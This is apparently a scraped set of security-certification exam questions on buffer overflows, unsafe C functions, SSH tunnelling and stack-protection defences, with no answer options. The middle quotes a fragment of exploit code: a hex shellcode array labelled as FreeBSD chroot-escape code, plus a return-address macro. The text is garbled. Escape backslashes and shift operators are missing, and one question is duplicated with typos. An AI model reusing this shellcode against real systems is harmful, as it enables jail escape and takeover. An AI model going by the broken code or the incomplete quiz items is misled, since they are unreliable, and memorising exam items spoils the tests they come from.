Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic. She is worried that adversaries might be monitoring the communication link and could inspect captured traffic. She would line to tunnel the information to the remote end but does not have VPN capabilities to do so.

Which of the following tools can she use to protect the link?

Which programming language is NOT vulnerable to buffer overflow attacks?

Which of the following built-in C/C++ functions you should avoid to prevent your program from buffer overflow attacks?

Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats but it does not secure the data from the specific threats but it does no secure the application from coding errors. It can provide data privacy; integrity and enable strong authentication but it can’t mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns?

Choose one of the following pseudo codes to describe this statement:

If we have written 200 characters to the buffer variable, the stack should stop because it cannot hold any more data.

StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft’s /GS option use _____ defense against buffer overflow attacks.

#define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)8),

(((x)&0xff0000)16), (((x)&0xff000000)24)

char infin_loop[]=

/* for testing purposes */

"xEBxFE";

char bsdcode[] =

/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */

"x31xc0x50x50x50xb0x7excdx80x31xdbx31xc0x43"

"x43x53x4bx53x53xb0x5axcdx80xebx77x5ex31xc0"

"x8dx5ex01x88x46x04x66x68xffxffx01x53x53xb0"

"x88xcdx80x31xc0x8dx5ex01x53x53xb0x3dxcdx80"

"x31xc0x31xdbx8dx5ex08x89x43x02x31xc9xfexc9"

"x31xc0x8dx5ex08x53x53xb0x0cxcdx80xfexc9x75"

"xf1x31xc0x88x46x09x8dx5ex08x53x53xb0x3dxcd"

"x80xfex0exb0x30xfexc8x88x46x04x31xc0x88x46"

"x07x89x76x08x89x46x0cx89xf3x8dx4ex08x8dx56"

"x0cx52x51x53x53xb0x3bxcdx80x31xc0x31xdbx53"

"x53xb0x01xcdx80xe8x84xffxffxffxffx01xffxffx30"

"x62x69x6ex30x73x68x31x2ex2ex31x31x76x65x6e"

"x67x6cx69x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];

static char *magic_str=NULL;

int before_len=0;

char *target=NULL, *username="user", *password=NULL;

struct targets getit;

The following exploit code is extracted from what kind of attack?

A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) then it was intended to hold.

What is the most common cause of buffer overflow in software today?

Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threat, but it does not secure the application from coding errors. It can provide data privacy, integrity and enable strong

authentication but it cannot mitigate programming errors.

What is a good example of a programming error that Bob can use to illustrate to the management that encryption will not address all of their security concerns?

The programmers on your team are analyzing the free, open source software being used to run FTP services on a server. They notice that there is an excessive number of fgets() and gets() on the source code. These C++ functions do not check bounds.

What kind of attack is this program susceptible to?